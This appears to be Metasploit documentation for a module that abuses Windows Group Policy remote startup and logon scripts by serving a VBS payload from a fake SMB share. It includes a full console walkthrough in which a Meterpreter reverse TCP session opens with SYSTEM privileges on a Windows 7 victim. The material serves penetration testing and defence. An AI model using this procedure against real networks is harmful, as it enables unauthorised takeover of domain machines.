## Vulnerable Application

This is a general-purpose module for exploiting systems with Windows Group Policy configured to load VBS startup/logon scripts from remote locations.
This module runs a SMB shared resource that will provide a payload through a VBS file. Startup scripts will be executed with SYSTEM privileges,
while logon scripts will be executed with the user privileges. The attacker still needs to redirect the target traffic to the fake SMB
share to exploit it successfully.

Please note in some cases, it will take 5 to 10 minutes to receive a session.

More information available at [Gotham Digital Science Security](https://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html)

## Verification Steps

  1. Start msfconsole
  2. Do: ```use modules/exploits/windows/smb/group_policy_startup```
  3. Do: ```exploit```

## Options

  **FILE_NAME**

  VBS File name to share (Default: random .vbs)

  **FOLDER_NAME**

  Folder name to share (Default: none)

  **SHARE**

  Share name (Default: Random)

## Scenarios

### Domain Group Policy

In this scenario, the following computers are present:

1. Windows 7 (x64, Build 7601, SP1): Victim
2. Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller

The module sets up the SMB share and VBScript file. Out of band (outside the scope of this module or docs) a Group Policy is simply applied to the `OU` computer container.
Next, the Win 7 box grabs the payload, in this case the meterpreter reverse_tcp stager on boot, with `SYSTEM` privs because its executed as a start up script.
Theoretically, any computer in that `OU` would also execute the script on started up.

  ```
  msf > use modules/exploits/windows/smb/group_policy_startup
  msf exploit(windows/smb/group_policy_startup) > set FILE_NAME startup.vbs
    FILE_NAME => startup.vbs
  msf exploit(windows/smb/group_policy_startup) > set SHARE scripts
    SHARE => scripts
  msf exploit(windows/smb/group_policy_startup) > exploit
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.

    [*] Started reverse TCP handler on 192.168.1.3:4444
    [*] File available on \\192.168.1.3\scripts\startup.vbs...
    [*] Started service listener on 192.168.1.3:445
    [*] Server started.
    [*] Sending stage (180291 bytes) to 192.168.1.4
    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-04 13:12:05 -0700
  msf exploit(windows/smb/group_policy_startup) > sessions 1
    [*] Starting interaction with 1...

  meterpreter > sysinfo
    Computer        : MSF-PC
    OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
    Architecture    : x64
    System Language : en_US
    Domain          : MSF
    Logged On Users : 1
    Meterpreter     : x86/windows
  meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
  ```
